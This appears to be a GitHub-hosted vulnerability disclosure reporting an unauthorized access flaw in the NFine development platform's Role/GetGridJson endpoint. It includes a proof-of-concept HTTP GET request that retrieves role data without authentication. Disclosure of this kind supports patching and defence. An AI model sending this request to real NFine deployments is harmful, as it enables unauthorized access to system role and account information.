Skip to content

Latest commit

 

History

History
24 lines (19 loc) · 881 Bytes

NFine rapid development platform Role-GetGridJson has unauthorized access vulnerability.md

File metadata and controls

24 lines (19 loc) · 881 Bytes

Exploit Title: NFine rapid development platform Role-GetGridJson has unauthorized access vulnerability

Date: 2023-05/11

Exploit Author: Peanut886

Vendor Homepage: unknown

Version: unknown

Tested on: windows10 + phpstudy

Description: NFine rapid development platform Role-GetGridJson has unauthorized access vulnerability

Sample request POC

GET /SystemManage/Role/GetGridJson?keyword=&page=1&rows=20 HTTP/1.1
Host: target:port
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
X-Requested-With: XMLHttpRequest


Return success

blockchain